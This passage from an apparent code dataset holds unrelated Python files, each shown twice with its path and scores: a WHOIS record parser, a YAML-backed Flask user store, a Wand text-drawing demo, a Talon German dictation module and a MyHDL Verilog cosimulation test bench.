Server:.*|WHOIS Server:.*") sec_whois_server = "" for match in pattern.findall(data): if match.find("Server:") != -1: sec_whois_server = match.split(":")[1].strip() return False if sec_whois_server == "" else sec_whois_server elif data.find("Registrar WHOIS Server:") != -1: # ws二级服务器 pattern = re.compile(r"Registrar WHOIS Server:.*") sec_whois_server = "" for match in pattern.findall(data): if match.find("Server:") != -1: sec_whois_server = match.split(":")[1].strip() return False if sec_whois_server == "" else sec_whois_server else: return False def extract_WHOIS_info(domain_punycode, tld, 
whois_addr, data, flag, format_time=True, format_domain_status=True, list_name_server=True, socket_time_out=5, socket_retry_time=1, use_sock_proxy=False, proxy_type="SOCKS5", proxy_ip="", proxy_port="", proxy_username="", proxy_password="", use_relay_WHOIS_server=False ): # type: (str, str, str, str, int, bool, bool, bool, int, int, bool, str, str, str, str, str, bool) -> dict """ :param domain_punycode: punycode格式的域名 :param tld: 顶级域 :param whois_addr: whois服务器 :param data: 服务器返回数据 :param flag: 数据正确性标记位 :param format_time: 标准化时间 :param format_domain_status: 标准化域名标记 :param list_name_server: 列表格式记录域名NS服务器标记 :param socket_time_out: socket 连接超时时间 :param socket_retry_time: socket 连接最大重试次数 :param use_sock_proxy: 是否使用socks代理 :param proxy_type: 代理的类型(仅支持 SOCKS4 , SOCKS5 不支持 HTTP,HTTPS 代理) :param proxy_ip: 代理ip :param proxy_port: 代理端口 :param proxy_username: 代理用户名 :param proxy_password: 代理密码 :param use_relay_WHOIS_server: 是否使用转发服务器查询标记 :return: whois 信息字典 """ # 返回结果初始化 global WHOIS_RECORD, CHOSE_WHOIS_server domain_whois = copy.deepcopy(WHOIS_RECORD) domain_whois["domain"] = domain_punycode domain_whois["tld"] = tld domain_whois["top_whois_server"] = whois_addr domain_whois["top_whois_detail"] = data domain_whois["flag"] = flag # 1. 
一级WHOIS错误,未找到WHOIS服务器,WHOIS信息为空 if domain_whois["flag"] < 0: # ,错误数据直接返回 粗处理直接返回 return domain_whois whois_details_first = data whois_details_sec = "" whois_extract_func = CHOSE_WHOIS_server.get_whois_func(whois_addr) sec_whois_srv = "" # 处理原始whois数据 if whois_extract_func == "com_manage" and tld in ["com", "net"]: # 针对com,net 等具有二级服务器的域名进行特殊处理 # 1,处理含有 "xxx="的情况 if is_xxx_exist(whois_details_first): whois_details_first = WHOIS_srv_connect("=" + domain_punycode, whois_addr, socket_time_out=socket_time_out, socket_retry_time=socket_retry_time, use_sock_proxy=use_sock_proxy, proxy_type=proxy_type, proxy_ip=proxy_ip, proxy_port=proxy_port, proxy_username=proxy_username, proxy_password=<PASSWORD>, use_relay_WHOIS_server=use_relay_WHOIS_server ) if whois_details_first.startswith("SOCKET ERROR"): domain_whois["flag"] = FLAG_TOP_WHOIS_FAILED # WHOIS服务器交互过程中出现异常 elif not whois_details_first: domain_whois["flag"] = FLAG_EMPTY_WHOIS_INFO # 获取到空数据 if domain_whois["flag"] < 0: # 错误数据直接返回 粗处理结果不调用提取函数 return domain_whois # 2,处理二级whois服务器 sec_whois_srv = extract_sec_server(whois_details_first, domain_punycode) if sec_whois_srv: # 如果获取到了二级whois地址,更新sec_whois并重新获取数据 domain_whois["sec_whois_server"] = sec_whois_srv whois_details_sec = WHOIS_srv_connect(domain_punycode, sec_whois_srv, socket_time_out=socket_time_out, socket_retry_time=socket_retry_time, use_sock_proxy=use_sock_proxy, proxy_type=proxy_type, proxy_ip=proxy_ip, proxy_port=proxy_port, proxy_username=proxy_username, proxy_password=<PASSWORD>, use_relay_WHOIS_server=use_relay_WHOIS_server ) if whois_details_sec.startswith("SOCKET ERROR"): domain_whois["flag"] = FLAG_SEC_WHOIS_FAILED # WHOIS服务器交互过程中出现异常 elif not whois_details_sec: domain_whois["flag"] = FLAG_EMPTY_WHOIS_INFO # 获取到空数据 domain_whois["sec_whois_detail"] = whois_details_sec else: domain_whois["flag"] = FLAG_NO_SEC_WHOI_ADDR # 没有获取到二级WHOIS服务器 domain_whois["details"] = whois_details_first + "\n##############################\n" + whois_details_sec # 
使用提取函数处理whois获取字典 依次解析一级/二级WHOIS数据 try: sec_domain_whois = copy.deepcopy(domain_whois) domain_whois = getattr(WHOIS_parser, whois_extract_func)(whois_details_first, domain_whois) if whois_details_sec and sec_whois_srv: sec_whois_extract_func = CHOSE_WHOIS_server.get_whois_func(sec_whois_srv) sec_domain_whois = getattr(WHOIS_parser, sec_whois_extract_func)(whois_details_sec, sec_domain_whois) # 合并字典 for k in sec_domain_whois.keys(): # 只更新部分字段 if k in ["sponsoring_registrar", "sec_whois_server", "reg_name", "reg_phone", "reg_email", "org_name", "creation_date", "expiration_date", "updated_date", "name_server"]: if sec_domain_whois[k].strip(): domain_whois[k] = sec_domain_whois[k] except Exception as extract_error: domain_whois["flag"] = FLAG_INFO_EXTRACT_FAILED # 处理状态值、标准化时间时间字符串 if format_domain_status: domain_whois["domain_status"] = get_status_value(domain_whois["domain_status"]) if format_time: domain_whois["creation_date"] = format_timestamp(domain_whois["creation_date"]) domain_whois["expiration_date"] = format_timestamp(domain_whois["expiration_date"]) domain_whois["updated_date"] = format_timestamp(domain_whois["updated_date"]) if list_name_server: domain_whois["name_server"] = domain_whois["name_server"].split(";") return domain_whois if __name__ == '__main__': # use demo data = WHOIS_srv_connect("baidu.com", "whois.verisign-grs.com") wr = extract_WHOIS_info("baidu.com", "com", "whois.verisign-grs.com", data, 1) print data print wr
WHOISpy/WHOIS_info_extract.py
import re import pytz import copy from dateutil.parser import parse import WHOIS_parser from WHOIS_connect import WHOIS_srv_connect utc_timezone = pytz.utc # 设置utc时区 CHOSE_WHOIS_server = WHOIS_parser.WHOIS_info_extract_func() WHOIS_RECORD = { "domain": "", # 域名 "tld": "", # 顶级域 "flag": "", # 状态标记 "domain_status": "", # 域名状态 "sponsoring_registrar": "", # 注册商 "top_whois_server": "", # 顶级域名服务器 "sec_whois_server": "", # 二级域名服务器 "reg_name": "", # 注册姓名 "reg_phone": "", # 注册电话 "reg_email": "", # 注册email "org_name": "", # 注册公司名称 "creation_date": "", # 创建时间 "expiration_date": "", # 到期时间 "updated_date": "", # 更新时间 "details": "", # 原始信息(一级WHOIS信息 + 二级WHOIS信息) "top_whois_detail": "", # 一级WHOIS信息 "sec_whois_detail": "", # 二级WHOIS信息 "name_server": "", # 域名服务器 } # WHOIS 数据标记位 FLAG_CANT_DEAL = 0 # 不能处理 FLAG_OK = 1 # 正常 FLAG_NO_WHOIS_ADDR = -1 # 未找到WHOIS服务器 FLAG_TOP_WHOIS_FAILED = -2 # 一级WHOIS获取错误 FLAG_NO_SEC_WHOI_ADDR = -3 # 未找到二级WHOIS服务器 FLAG_SEC_WHOIS_FAILED = -4 # 二级WHOIS获取错误 FLAG_EMPTY_WHOIS_INFO = -5 # WHOIS信息为空 FLAG_INFO_EXTRACT_FAILED = -6 # WHOIS关键信息解析失败 # 状态值字典 WHOIS_STATUS_DICT = { # EPP "ADDPERIOD": "1", "AUTORENEWPERIOD": "2", "INACTIVE": "3", "OK": "4", "PENDINGCREATE": "5", "PENDINGDELETE": "6", "PENDINGRENEW": "7", "PENDINGRESTORE": "8", "PENDINGTRANSFER": "9", "PENDINGUPDATE": "10", "REDEMPTIONPERIOD": "11", "RENEWPERIOD": "12", "SERVERDELETEPROHIBITED": "13", "SERVERHOLD": "14", "SERVERRENEWPROHIBITED": "15", "SERVERTRANSFERPROHIBITED": "16", "SERVERUPDATEPROHIBITED": "17", "TRANSFERPERIOD": "18", "CLIENTDELETEPROHIBITED": "19", "CLIENTHOLD": "20", "CLIENTRENEWPROHIBITED": "21", "CLIENTTRANSFERPROHIBITED": "22", "CLIENTUPDATEPROHIBITED": "23", # RRP "ACTIVE": "24", "REGISTRYLOCK": "25", "REGISTRARLOCK": "26", "REGISTRYHOLD": "27", "REGISTRARHOLD": "28", # "REDEMPTIONPERIOD": "29", 重复 # "PENDINGRESTORE": "30", 重复 # "PENDINGDELETE": "31", 重复 "NOTEXIST": "29", # 域名不存在 "NOSTATUS": "30", # 无状态值 "CONNECT": "31", # de服务器状态 } def format_timestamp(str_time): 
"""将时间字符串进行标准化处理""" try: time_parse = parse(str_time) # 解析日期为datetime型 except ValueError, e: return str_time try: time_parse = time_parse.astimezone(tz=utc_timezone) # 有时区转换为北京时间 except ValueError, e: time_parse = utc_timezone.localize(time_parse) # 无时区转换为localtime,即北京时间 D, T = str(time_parse).split(" ", 1) return D + " " + T[:8] def get_status_value(status_str): """ 将域名状态字符串转换成状态值 :param status_str: 域名状态字符串 :return: 状态值[若无状态则默认为30(NOSTATUS), 非标准状态值只变成大写""" global WHOIS_STATUS_DICT status_return = "" if status_str == "": return "30" infos = status_unite(status_str).split(";") for status in infos: status_value = WHOIS_STATUS_DICT.get(status, "0") if status_value == "0": status_value = status status_return += status_value status_return += ";" return status_return.strip(";") def status_unite(status): """状态字符串格式处理""" while status.find(" ") != -1: status = status.replace(" ", ";") while status.find("-") != -1: status = status.replace("-", ";") return status.upper() def is_xxx_exist(data): """用来判断com_manage函数中,得到的whois信息是否包含xxx标志,若包括则需要重新发送""" if data.find("\"xxx\"") != -1 and data.find("\"=xxx\"") != -1: return True else: return False def extract_sec_server(data, domain): """提取原始whois信息中的,二级whois服务器""" if not data: return False if data.find("Domain Name: %s" % domain.upper()) != -1: pos = data.find("Domain Name: %s" % domain.upper()) data = data[pos:] pattern = re.compile(r"Whois Server:.*|WHOIS Server:.*") sec_whois_server = "" for match in pattern.findall(data): if match.find("Server:") != -1: sec_whois_server = match.split(":")[1].strip() return False if sec_whois_server == "" else sec_whois_server elif data.find("Registrar WHOIS Server:") != -1: # ws二级服务器 pattern = re.compile(r"Registrar WHOIS Server:.*") sec_whois_server = "" for match in pattern.findall(data): if match.find("Server:") != -1: sec_whois_server = match.split(":")[1].strip() return False if sec_whois_server == "" else sec_whois_server else: return False def extract_WHOIS_info(domain_punycode, tld, 
whois_addr, data, flag, format_time=True, format_domain_status=True, list_name_server=True, socket_time_out=5, socket_retry_time=1, use_sock_proxy=False, proxy_type="SOCKS5", proxy_ip="", proxy_port="", proxy_username="", proxy_password="", use_relay_WHOIS_server=False ): # type: (str, str, str, str, int, bool, bool, bool, int, int, bool, str, str, str, str, str, bool) -> dict """ :param domain_punycode: punycode格式的域名 :param tld: 顶级域 :param whois_addr: whois服务器 :param data: 服务器返回数据 :param flag: 数据正确性标记位 :param format_time: 标准化时间 :param format_domain_status: 标准化域名标记 :param list_name_server: 列表格式记录域名NS服务器标记 :param socket_time_out: socket 连接超时时间 :param socket_retry_time: socket 连接最大重试次数 :param use_sock_proxy: 是否使用socks代理 :param proxy_type: 代理的类型(仅支持 SOCKS4 , SOCKS5 不支持 HTTP,HTTPS 代理) :param proxy_ip: 代理ip :param proxy_port: 代理端口 :param proxy_username: 代理用户名 :param proxy_password: 代理密码 :param use_relay_WHOIS_server: 是否使用转发服务器查询标记 :return: whois 信息字典 """ # 返回结果初始化 global WHOIS_RECORD, CHOSE_WHOIS_server domain_whois = copy.deepcopy(WHOIS_RECORD) domain_whois["domain"] = domain_punycode domain_whois["tld"] = tld domain_whois["top_whois_server"] = whois_addr domain_whois["top_whois_detail"] = data domain_whois["flag"] = flag # 1. 
一级WHOIS错误,未找到WHOIS服务器,WHOIS信息为空 if domain_whois["flag"] < 0: # ,错误数据直接返回 粗处理直接返回 return domain_whois whois_details_first = data whois_details_sec = "" whois_extract_func = CHOSE_WHOIS_server.get_whois_func(whois_addr) sec_whois_srv = "" # 处理原始whois数据 if whois_extract_func == "com_manage" and tld in ["com", "net"]: # 针对com,net 等具有二级服务器的域名进行特殊处理 # 1,处理含有 "xxx="的情况 if is_xxx_exist(whois_details_first): whois_details_first = WHOIS_srv_connect("=" + domain_punycode, whois_addr, socket_time_out=socket_time_out, socket_retry_time=socket_retry_time, use_sock_proxy=use_sock_proxy, proxy_type=proxy_type, proxy_ip=proxy_ip, proxy_port=proxy_port, proxy_username=proxy_username, proxy_password=<PASSWORD>, use_relay_WHOIS_server=use_relay_WHOIS_server ) if whois_details_first.startswith("SOCKET ERROR"): domain_whois["flag"] = FLAG_TOP_WHOIS_FAILED # WHOIS服务器交互过程中出现异常 elif not whois_details_first: domain_whois["flag"] = FLAG_EMPTY_WHOIS_INFO # 获取到空数据 if domain_whois["flag"] < 0: # 错误数据直接返回 粗处理结果不调用提取函数 return domain_whois # 2,处理二级whois服务器 sec_whois_srv = extract_sec_server(whois_details_first, domain_punycode) if sec_whois_srv: # 如果获取到了二级whois地址,更新sec_whois并重新获取数据 domain_whois["sec_whois_server"] = sec_whois_srv whois_details_sec = WHOIS_srv_connect(domain_punycode, sec_whois_srv, socket_time_out=socket_time_out, socket_retry_time=socket_retry_time, use_sock_proxy=use_sock_proxy, proxy_type=proxy_type, proxy_ip=proxy_ip, proxy_port=proxy_port, proxy_username=proxy_username, proxy_password=<PASSWORD>, use_relay_WHOIS_server=use_relay_WHOIS_server ) if whois_details_sec.startswith("SOCKET ERROR"): domain_whois["flag"] = FLAG_SEC_WHOIS_FAILED # WHOIS服务器交互过程中出现异常 elif not whois_details_sec: domain_whois["flag"] = FLAG_EMPTY_WHOIS_INFO # 获取到空数据 domain_whois["sec_whois_detail"] = whois_details_sec else: domain_whois["flag"] = FLAG_NO_SEC_WHOI_ADDR # 没有获取到二级WHOIS服务器 domain_whois["details"] = whois_details_first + "\n##############################\n" + whois_details_sec # 
使用提取函数处理whois获取字典 依次解析一级/二级WHOIS数据 try: sec_domain_whois = copy.deepcopy(domain_whois) domain_whois = getattr(WHOIS_parser, whois_extract_func)(whois_details_first, domain_whois) if whois_details_sec and sec_whois_srv: sec_whois_extract_func = CHOSE_WHOIS_server.get_whois_func(sec_whois_srv) sec_domain_whois = getattr(WHOIS_parser, sec_whois_extract_func)(whois_details_sec, sec_domain_whois) # 合并字典 for k in sec_domain_whois.keys(): # 只更新部分字段 if k in ["sponsoring_registrar", "sec_whois_server", "reg_name", "reg_phone", "reg_email", "org_name", "creation_date", "expiration_date", "updated_date", "name_server"]: if sec_domain_whois[k].strip(): domain_whois[k] = sec_domain_whois[k] except Exception as extract_error: domain_whois["flag"] = FLAG_INFO_EXTRACT_FAILED # 处理状态值、标准化时间时间字符串 if format_domain_status: domain_whois["domain_status"] = get_status_value(domain_whois["domain_status"]) if format_time: domain_whois["creation_date"] = format_timestamp(domain_whois["creation_date"]) domain_whois["expiration_date"] = format_timestamp(domain_whois["expiration_date"]) domain_whois["updated_date"] = format_timestamp(domain_whois["updated_date"]) if list_name_server: domain_whois["name_server"] = domain_whois["name_server"].split(";") return domain_whois if __name__ == '__main__': # use demo data = WHOIS_srv_connect("baidu.com", "whois.verisign-grs.com") wr = extract_WHOIS_info("baidu.com", "com", "whois.verisign-grs.com", data, 1) print data print wr
0.116512
0.198763
import os import yaml import logging from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler from flask_securest.userstores import simple from flask_securest.constants import FLASK_SECUREST_LOGGER_NAME class FileUserstore(simple.SimpleUserstore, FileSystemEventHandler): def __init__(self, userstore_file_path): self.lgr = logging.getLogger(name=FLASK_SECUREST_LOGGER_NAME) self.userstore_file_path = os.path.abspath(userstore_file_path) self.users = None self.groups = None self.observer = Observer() self.observer.schedule(self, path=os.path.dirname( self.userstore_file_path), recursive=False) self.load_userstore() self.observer.start() def on_modified(self, event): if os.path.abspath(event.src_path) == self.userstore_file_path: self.load_userstore() def load_userstore(self): ''' This function updates the userstore in-case the file holding the data was modified. :return: ''' self.lgr.info('Loading userstore from {file}.' .format(file=self.userstore_file_path)) try: with open(self.userstore_file_path) as f: userstore = yaml.safe_load(f.read()) except (yaml.parser.ParserError, IOError) as e: err = 'Failed parsing {userstore_file} file. Users and groups ' \ 'will not be loaded. Error: {error}.'\ .format(userstore_file=self.userstore_file_path, error=str(e)) self.lgr.warning(err) raise ValueError(err) if isinstance(userstore, dict): if 'users' in userstore.keys(): self.users = userstore.get('users') else: err = 'Users not found in {file} yaml. Failed loading users.'\ .format(file=self.userstore_file_path) self.lgr.warning(err) raise ValueError(err) self.groups = userstore.get('groups') else: err = '{userstore_file} yaml is not a valid dict. Userstore ' \ 'file will not be loaded.'\ .format(userstore_file=self.userstore_file_path) self.lgr.warning(err) raise ValueError() self.lgr.info('Loading of userstore ended successfully.')
flask_securest/userstores/file_userstore.py
import os import yaml import logging from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler from flask_securest.userstores import simple from flask_securest.constants import FLASK_SECUREST_LOGGER_NAME class FileUserstore(simple.SimpleUserstore, FileSystemEventHandler): def __init__(self, userstore_file_path): self.lgr = logging.getLogger(name=FLASK_SECUREST_LOGGER_NAME) self.userstore_file_path = os.path.abspath(userstore_file_path) self.users = None self.groups = None self.observer = Observer() self.observer.schedule(self, path=os.path.dirname( self.userstore_file_path), recursive=False) self.load_userstore() self.observer.start() def on_modified(self, event): if os.path.abspath(event.src_path) == self.userstore_file_path: self.load_userstore() def load_userstore(self): ''' This function updates the userstore in-case the file holding the data was modified. :return: ''' self.lgr.info('Loading userstore from {file}.' .format(file=self.userstore_file_path)) try: with open(self.userstore_file_path) as f: userstore = yaml.safe_load(f.read()) except (yaml.parser.ParserError, IOError) as e: err = 'Failed parsing {userstore_file} file. Users and groups ' \ 'will not be loaded. Error: {error}.'\ .format(userstore_file=self.userstore_file_path, error=str(e)) self.lgr.warning(err) raise ValueError(err) if isinstance(userstore, dict): if 'users' in userstore.keys(): self.users = userstore.get('users') else: err = 'Users not found in {file} yaml. Failed loading users.'\ .format(file=self.userstore_file_path) self.lgr.warning(err) raise ValueError(err) self.groups = userstore.get('groups') else: err = '{userstore_file} yaml is not a valid dict. Userstore ' \ 'file will not be loaded.'\ .format(userstore_file=self.userstore_file_path) self.lgr.warning(err) raise ValueError() self.lgr.info('Loading of userstore ended successfully.')
0.293708
0.062646
from wand.image import Image from wand.drawing import Drawing from wand.color import Color import os # this is original code. font_normal = 'Noto-Sans' font_italic = 'Noto-Sans-Italic' font_bold = 'Noto-Sans-Bold' if os.name == 'nt': font_normal = 'Arial' font_italic = 'Arial-Italic' font_bold = 'Arial-Bold' w = 500 h = 350 with Drawing() as draw: with Image(width=w, height=h, background=Color('lightblue')) as img: draw.font_size = 32 draw.fill_color = Color('blue') # [Style] draw.font = font_normal draw.text(0, 30, '[Style]') # Italic ( you must use italic-compliant font, e.g. Arial, ) draw.font = font_italic draw.font_style = 'italic' draw.text(0, 60, 'Italic') draw.font_style = 'normal' # default # Bold ( you must use bold-compliant font, e.g. Courier, ) draw.font = font_bold draw.text(0, 90, 'Bold') # Underline draw.font = font_normal draw.text_decoration = 'underline' draw.text(0, 120, 'Underline') # Is the line rather thin? # Overline draw.text_decoration = 'overline' draw.text(0, 160, 'Overline') # Strike draw.text_decoration = 'line_through' draw.text(0, 190, 'Strike') draw.text_decoration = 'no' # default # Non-Antialias draw.text_antialias = False draw.text(0, 220, 'Antialias-off') draw.text_antialias = True # default # [Stroke] draw.fill_color = Color('dodgerblue') draw.stroke_color = Color('blue') draw.stroke_width = 1 draw.text(200, 30, '[Stroke]') # Non-Antialias draw.stroke_antialias = False draw.text(200, 60, 'Antialias-off') draw.stroke_antialias = True # default # Opacity draw.stroke_opacity = 0.3 draw.text(200, 90, 'Opacity') draw.stroke_opacity = 1.0 # default # Width draw.stroke_width = 2.0 draw.text(200, 120, 'Width') draw.stroke_width = 1 draw.stroke_color = Color('none') # default # [Space] draw.fill_color = Color('blue') draw.text(200, 170, '[Space]') # Kerning draw.text_kerning = -2 draw.text(200, 200, 'Kerning=-2') draw.text_kerning = 0 draw.text(200, 230, 'Kerning=0') draw.text_kerning = 2 draw.text(200, 260, 'Kerning=2') 
draw.text_kerning = 0 # Word Space draw.text_interword_spacing = 10 draw.text(200, 290, 'Word Space 10') draw.text_interword_spacing = 20 draw.text(200, 320, 'Word Space 20') draw(img) img.save(filename='sample14.png')
examples/text/sample14_more_attributes.py
from wand.image import Image from wand.drawing import Drawing from wand.color import Color import os # this is original code. font_normal = 'Noto-Sans' font_italic = 'Noto-Sans-Italic' font_bold = 'Noto-Sans-Bold' if os.name == 'nt': font_normal = 'Arial' font_italic = 'Arial-Italic' font_bold = 'Arial-Bold' w = 500 h = 350 with Drawing() as draw: with Image(width=w, height=h, background=Color('lightblue')) as img: draw.font_size = 32 draw.fill_color = Color('blue') # [Style] draw.font = font_normal draw.text(0, 30, '[Style]') # Italic ( you must use italic-compliant font, e.g. Arial, ) draw.font = font_italic draw.font_style = 'italic' draw.text(0, 60, 'Italic') draw.font_style = 'normal' # default # Bold ( you must use bold-compliant font, e.g. Courier, ) draw.font = font_bold draw.text(0, 90, 'Bold') # Underline draw.font = font_normal draw.text_decoration = 'underline' draw.text(0, 120, 'Underline') # Is the line rather thin? # Overline draw.text_decoration = 'overline' draw.text(0, 160, 'Overline') # Strike draw.text_decoration = 'line_through' draw.text(0, 190, 'Strike') draw.text_decoration = 'no' # default # Non-Antialias draw.text_antialias = False draw.text(0, 220, 'Antialias-off') draw.text_antialias = True # default # [Stroke] draw.fill_color = Color('dodgerblue') draw.stroke_color = Color('blue') draw.stroke_width = 1 draw.text(200, 30, '[Stroke]') # Non-Antialias draw.stroke_antialias = False draw.text(200, 60, 'Antialias-off') draw.stroke_antialias = True # default # Opacity draw.stroke_opacity = 0.3 draw.text(200, 90, 'Opacity') draw.stroke_opacity = 1.0 # default # Width draw.stroke_width = 2.0 draw.text(200, 120, 'Width') draw.stroke_width = 1 draw.stroke_color = Color('none') # default # [Space] draw.fill_color = Color('blue') draw.text(200, 170, '[Space]') # Kerning draw.text_kerning = -2 draw.text(200, 200, 'Kerning=-2') draw.text_kerning = 0 draw.text(200, 230, 'Kerning=0') draw.text_kerning = 2 draw.text(200, 260, 'Kerning=2') 
draw.text_kerning = 0 # Word Space draw.text_interword_spacing = 10 draw.text(200, 290, 'Word Space 10') draw.text_interword_spacing = 20 draw.text(200, 320, 'Word Space 20') draw(img) img.save(filename='sample14.png')
0.429429
0.083404
import time import pickle import os.path import re from talon import ( Module, Context, actions, registry, ) from talon.grammar import Phrase from talon import speech_system, Context from talon.engines.vosk import VoskEngine vosk_de = VoskEngine(model="vosk-model-small-de-0.15", language="de_DE") vosk_de.set_vocab(["finish", "bapfel", "hückelhoven"]) speech_system.add_engine(vosk_de) capitalized_words = set() def load_dictionary(): global capitalized_words dictionary_path = os.path.realpath( os.path.join(os.path.abspath(__file__), "../../dictionary/german.dic") ) dictionary_cache_path = os.path.realpath( os.path.join(os.path.abspath(__file__), "../../dictionary/german.pickle") ) # load dictionary if not os.path.exists(dictionary_cache_path) or os.path.getmtime( dictionary_cache_path ) < os.path.getmtime(dictionary_path): # recreate cache with open(dictionary_path, encoding="ISO-8859-1") as file: for word in file: if word[0].isupper(): capitalized_words.add(word.lower().strip()) with open(dictionary_cache_path, "wb") as file: # Pickle the 'data' dictionary using the highest protocol available. 
pickle.dump(capitalized_words, file, pickle.HIGHEST_PROTOCOL) else: # read from cache with open(dictionary_cache_path, "rb") as file: capitalized_words = pickle.load(file) load_dictionary() mod = Module() mod.tag("german", desc="Start german dictation") ctx__activate = Context() ctx__activate.matches = "tag: user.german" ctx__activate.settings = { "speech.engine": "vosk", # 'speech.language': 'de_DE', "speech.timeout": 0.2, } ctx = Context() formatter = None end_after_speak = False class State: start_of_sentence = True latent_space = False dictation_state = State() punctuation_words = { "punkt": ".", "strich": ",", "ausrufezeichen": "!", "fragezeichen": "?", "doppelpunkt": ":", } end_of_sentence_words = { "!", "?", ".", } @mod.action_class class Actions: def activate_german(): """???""" ctx.tags = ["user.german"] def deactivate_german(): """???""" ctx.tags = [] def german_sentence(): """???""" global formatter, end_after_speak formatter = "sentence" end_after_speak = True actions.user.activate_german() def german_dictation(): """???""" global formatter, end_after_speak formatter = "dictation" end_after_speak = False dictation_state.start_of_sentence = True dictation_state.latent_space = False actions.user.activate_german() def german_words(): """???""" global formatter, end_after_speak formatter = "words" end_after_speak = True actions.user.activate_german() def german_process(phrase: Phrase): """???""" global formatter, end_after_speak if formatter == "sentence": text = phrase[0].upper() + phrase[1:] + "." 
elif formatter == "dictation": text = "" for word in phrase: # avoid space before following symbols if word == "eingabe" or word in punctuation_words: dictation_state.latent_space = False # insert space after last word if dictation_state.latent_space: text = text + " " dictation_state.latent_space = False if word in punctuation_words: # replace punctuation words text = text + punctuation_words[word] if punctuation_words[word] in end_of_sentence_words: dictation_state.start_of_sentence = True dictation_state.latent_space = True elif word == "eingabe": text = text + "\n" elif dictation_state.start_of_sentence or word in capitalized_words: # capitalize first word in sentence text = text + word[0].upper() + word[1:] dictation_state.start_of_sentence = False dictation_state.latent_space = True else: text = text + word dictation_state.latent_space = True else: text = phrase actions.insert(text) if end_after_speak: ctx.tags = [] def german_dictation_add(): """???""" print("to do")
adabru_talon/code/german.py
import time import pickle import os.path import re from talon import ( Module, Context, actions, registry, ) from talon.grammar import Phrase from talon import speech_system, Context from talon.engines.vosk import VoskEngine vosk_de = VoskEngine(model="vosk-model-small-de-0.15", language="de_DE") vosk_de.set_vocab(["finish", "bapfel", "hückelhoven"]) speech_system.add_engine(vosk_de) capitalized_words = set() def load_dictionary(): global capitalized_words dictionary_path = os.path.realpath( os.path.join(os.path.abspath(__file__), "../../dictionary/german.dic") ) dictionary_cache_path = os.path.realpath( os.path.join(os.path.abspath(__file__), "../../dictionary/german.pickle") ) # load dictionary if not os.path.exists(dictionary_cache_path) or os.path.getmtime( dictionary_cache_path ) < os.path.getmtime(dictionary_path): # recreate cache with open(dictionary_path, encoding="ISO-8859-1") as file: for word in file: if word[0].isupper(): capitalized_words.add(word.lower().strip()) with open(dictionary_cache_path, "wb") as file: # Pickle the 'data' dictionary using the highest protocol available. 
pickle.dump(capitalized_words, file, pickle.HIGHEST_PROTOCOL) else: # read from cache with open(dictionary_cache_path, "rb") as file: capitalized_words = pickle.load(file) load_dictionary() mod = Module() mod.tag("german", desc="Start german dictation") ctx__activate = Context() ctx__activate.matches = "tag: user.german" ctx__activate.settings = { "speech.engine": "vosk", # 'speech.language': 'de_DE', "speech.timeout": 0.2, } ctx = Context() formatter = None end_after_speak = False class State: start_of_sentence = True latent_space = False dictation_state = State() punctuation_words = { "punkt": ".", "strich": ",", "ausrufezeichen": "!", "fragezeichen": "?", "doppelpunkt": ":", } end_of_sentence_words = { "!", "?", ".", } @mod.action_class class Actions: def activate_german(): """???""" ctx.tags = ["user.german"] def deactivate_german(): """???""" ctx.tags = [] def german_sentence(): """???""" global formatter, end_after_speak formatter = "sentence" end_after_speak = True actions.user.activate_german() def german_dictation(): """???""" global formatter, end_after_speak formatter = "dictation" end_after_speak = False dictation_state.start_of_sentence = True dictation_state.latent_space = False actions.user.activate_german() def german_words(): """???""" global formatter, end_after_speak formatter = "words" end_after_speak = True actions.user.activate_german() def german_process(phrase: Phrase): """???""" global formatter, end_after_speak if formatter == "sentence": text = phrase[0].upper() + phrase[1:] + "." 
elif formatter == "dictation": text = "" for word in phrase: # avoid space before following symbols if word == "eingabe" or word in punctuation_words: dictation_state.latent_space = False # insert space after last word if dictation_state.latent_space: text = text + " " dictation_state.latent_space = False if word in punctuation_words: # replace punctuation words text = text + punctuation_words[word] if punctuation_words[word] in end_of_sentence_words: dictation_state.start_of_sentence = True dictation_state.latent_space = True elif word == "eingabe": text = text + "\n" elif dictation_state.start_of_sentence or word in capitalized_words: # capitalize first word in sentence text = text + word[0].upper() + word[1:] dictation_state.start_of_sentence = False dictation_state.latent_space = True else: text = text + word dictation_state.latent_space = True else: text = phrase actions.insert(text) if end_after_speak: ctx.tags = [] def german_dictation_add(): """???""" print("to do")
0.227813
0.102979
from __future__ import division from __future__ import print_function import os import argparse from argparse import Namespace import array import numpy as np from scipy import signal import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt from matplotlib import mlab from myhdl import * def _prep_cosim(args, **sigs): """ prepare the cosimulation environment """ # compile the verilog files with the verilog simulator files = ['../myhdl/mm_sop1.v', '../myhdl/mm_sop2.v', '../bsv/mkSOP1.v', '../bsv/mkSOP2.v', '../chisel/generated/mc_sop1.v', #'../chisel/generated/mc_sop2.v', './tb_mathsop.v',] print("compiling ...") cmd = "iverilog -o mathsop %s " % (" ".join(files)) print(" *%s" % (cmd)) os.system(cmd) # get the handle to the print("cosimulation setup ...") cmd = "vvp -m ./myhdl.vpi mathsop" if not os.path.exists("vcd"): os.makedirs("vcd") return Cosimulation(cmd, **sigs) def _create_chirp(args, imax=8): """generate a chirp signal, DUT input """ tarray = np.arange(args.Nsamps/2)*(1./args.Fs) # chirp(tarray, time zero freq, time end freq, end freq) xin = signal.chirp(tarray, 2, tarray[-1], 230, method=u'logarithmic') * .94 # chirp down and up xin = np.concatenate( (xin, np.array([-1*ss for ss in reversed(xin[:-1])]), -1*xin[:30], )) xin = map(int, [round(xx*imax) for xx in xin]) return xin def test_mathsop_verilogs(args): """the SOP (FIR filter) test stimulus """ clock = Signal(bool(0)) reset = ResetSignal(0, active=0, async=True) imin,imax = -2**15, 2**15 x = Signal(intbv(0, min=imin, max=imax)) (ym1,ym2, yb1,yb2, yc1,yc2,) = [Signal(intbv(0, min=imin, max=imax)) for _ in range(6)] tbdut = _prep_cosim(args, clock=clock, reset=reset, x=x, ym1=ym1, ym2=ym2, yb1=yb1, yb2=yb2, yc1=yc1, yc2=yc2) # create the inputs and output containers xhrp = _create_chirp(args, imax=imax) ym1v = array.array('h', [0 for _ in range(args.Nsamps)]) ym2v = array.array('h', [0 for _ in range(args.Nsamps)]) yb1v = array.array('h', [0 for _ in range(args.Nsamps)]) yb2v = 
